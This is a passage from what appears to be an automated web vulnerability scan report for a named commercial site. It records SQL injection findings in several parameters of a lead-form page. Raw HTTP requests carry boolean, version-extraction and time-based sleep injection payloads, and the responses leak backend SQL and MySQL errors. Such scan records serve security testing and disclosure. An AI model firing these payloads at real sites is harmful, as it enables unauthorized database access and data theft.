GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour14010757'%20or%201%3d2--%20&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.178. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_397 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_397 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_397 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500'&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0bt87cpl5h38rikk9q894i5ck0; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailad' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500''&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=krmt4q9euuf149ei3fkrv85ms2; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.179. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_397 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_397 parameter appears to be vulnerable to SQL injection attacks. The payloads 13322733'%20or%201%3d1--%20 and 13322733'%20or%201%3d2--%20 were each submitted in the attributeId_397 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c50013322733'%20or%201%3d1--%20&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c50013322733'%20or%201%3d2--%20&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:43:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.180. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_508%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_508%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_508%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v0cfmvtvugo1n1vdbq3c3l6uv0; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9e0kgn6h2671ktub60jeck76e2; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.181. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_508%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_508%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payloads 12543062'%20or%201%3d1--%20 and 12543062'%20or%201%3d2--%20 were each submitted in the attributeId_508%5B%5D parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing12543062'%20or%201%3d1--%20&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:43:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
